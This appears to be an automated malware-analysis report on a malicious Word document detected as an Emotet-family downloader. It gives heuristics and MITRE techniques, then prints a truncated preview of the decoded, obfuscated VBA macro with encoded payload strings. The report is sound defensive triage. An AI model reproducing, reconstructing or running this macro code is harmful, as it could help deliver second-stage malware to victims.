MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and CreateObject calls, which are indicative of malicious intent. The presence of legacy WordBasic and Excel 4.0 macros further supports this. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' suggests it's a known downloader. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, aligning with the 'Emodldr' family's typical behavior.
Heuristics 9
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70137 bytes |
SHA-256: 9f8576edc651633bfa901584406da3c9df74a58899b5e3affa0da9c432928854 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 23 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OoUGIPmH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DzdITkQ"
Function jkQLKTBdibHwj()
On Error Resume Next
Select Case qlYDlA
Case 94482
dHkGj = AuSkOB
RrFtCM = Nivbo
SFisWR = Cos(76926 * CBool(99495))
Case 59539
uHVjwE = 20959
GrOYtT = Fix(18928)
nhnvLJ = Oct(35794)
End Select
PhfspQYcSc = lsqkpT("b@O.NAYDA2AwYAYGA1AAZAgDAyAwYAADAxAgNAIGA2AAZAQDA3AQMAQ7nwY", 5 + 0, 51 + 0)
Select Case NuPZNz
Case 25670
mRLmhj = JXwUw
uLLjn = GMjPlo
SCollJ = Cos(58077 * CBool(68231))
Case 71778
HXBGNi = 45407
oWYTi = Fix(7502)
aSGTDC = Oct(50207)
End Select
Select Case SORmUl
Case 33169
vJfrY = vqbza
DKJOkq = tzPRNQ
KPndc = Cos(97185 * CBool(47382))
Case 60088
krjkS = 79016
EzzisH = Fix(11413)
CiIXW = Oct(61369)
End Select
oTfLzHwz = lsqkpT("hlzZAMGAlBQZAYDAxAwNAQGAjBwYAEDAjBQYAYDA4AQYAEDA4AQYAMGAmBwNAgDAwAgYAYDA3AQOAwHA9AQPAEFACBQUAQDAvBwKAUGAB,8pTv", 6 + 0, 102 + 0)
Select Case RaRtjD
Case 95239
bXYmY = BFKEz
UPmND = kbwqB
rsZIS = Cos(49104 * CBool(17243))
Case 91775
aVGUU = 64851
AYwSWU = Fix(47136)
oEqWT = Oct(42546)
End Select
Select Case UToiKT
Case 12386
QKCbsM = GrwdBp
hMMOq = pzOYzT
cIOdIR = Cos(46283 * CBool(15754))
Case 29610
ZQOdj = 36350
KGkJlc = Fix(36234)
dIwSvi = Oct(54318)
End Select
aGmuzItl = lsqkpT("F9JwAjBwYAgDAiBQOAQDA0AQNAYGAkBgMAADA1AAMAMDAlBQNAYDAwAANAIDAiBQYAYGA5AAZAIDAyAgNAUGA3AgMAcDAxAwMAADA2AQMAMDA0AQNAQcIC", 4 + 0, 111 + 0)
Select Case RNzcS
Case 39291
RCSqmz = TGiQNs
kqjvhf = ZpTrz
zQmpfp = Cos(42373 * CBool(37840))
Case 14212
ljwBp = 85404
iQjpjX = Fix(32985)
locrNw = Oct(98533)
End Select
Select Case BvhBd
Case 24365
wppqlR = LNQrHa
SBWjm = zNvOC
BKNrZZ = Cos(3888 * CBool(34265))
Case 901
CjrWBq = 90079
zAHjj = Fix(88949)
Rqsuk = Oct(89252)
End Select
ojJwHnCiH = lsqkpT("99OTAQZAUDAxAQOAMGAhBwNAEGAlBwYAMDAhBQNAcDA5AQOAUGAlBQMAQDAmBQNAEDA5AQYAgDA3AANAUGA3AAZAUDA2AQYAcDAhBwMAUDAkBQOAQDAiBgNAcSz", 4 + 0, 116 + 0)
Select Case nLPXzW
Case 81001
FIYbz = sQSHTn
CSSbT = IiJWPw
tfGdsY = Cos(33732 * CBool(59233))
Case 89137
KHvVYa = 49485
RHJksw = Fix(93701)
qhjwlJ = Oct(59436)
End Select
Select Case OVDHCm
Case 38026
KqnSkm = bXKzi
SilFt = jNrjk
HKiFt = Cos(17920 * CBool(97742))
Case 46483
vQDhB = 73518
YnQFSO = Fix(92957)
RBJOkY = Oct(37184)
End Select
jbPEnSW = lsqkpT("1U7MAIGAzAgMAUGAwAgMAQGAzAAZAADAlBQYAkDAmBQNAADAzAwMAgDA5AgNAMDAiBgZAIDAiBgNAIGA2AgZAcDAiBAZAQGA2AAMAYGAhBwNAMDAiBQMAUDAhBg36GP", 5 + 0, 120 + 0)
Select Case CKcbm
Case 42191
BAFsWS = YsmHoE
fqtOr = rzknAc
BXYKp = Cos(4470 * CBool(16677))
Case 28404
MVaUk = 56898
bdjPn = Fix(44203)
jNuin = Oct(2964)
End Select
Select Case zllIz
Case 38393
miMcZW = uuhlCz
BdSWn = trJGSQ
fojwJ = Cos(14033 * CBool(74932))
Case 785
mCEAi = 60459
FwrImz = Fix(14420)
mLpzv = Oct(49101)
End Select
uzYYLSqT = lsqkpT("IK3AJAIDAiBAMAADA0AQZA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.